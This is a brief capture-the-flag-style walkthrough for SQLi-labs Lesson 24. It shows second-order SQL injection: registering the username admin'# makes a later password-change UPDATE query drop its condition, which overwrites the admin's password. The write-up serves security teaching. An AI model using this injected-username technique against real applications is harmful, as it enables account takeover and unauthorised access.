SQLi-labs: Lesson 24

Second order SQL injection

Suppose you want to change admin’s password.

  1. Register a new user, use admin’#as username.
  2. Login as admin'# and change your password to, for example, 1234.

  3. The source code is:

    UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

    so the sql query would be:

    UPDATE users SET PASSWORD='1234' where username='admin'#' and password='$curr_pass'

  4. admin’s password is successfully changed.

results matching ""

    No results matching ""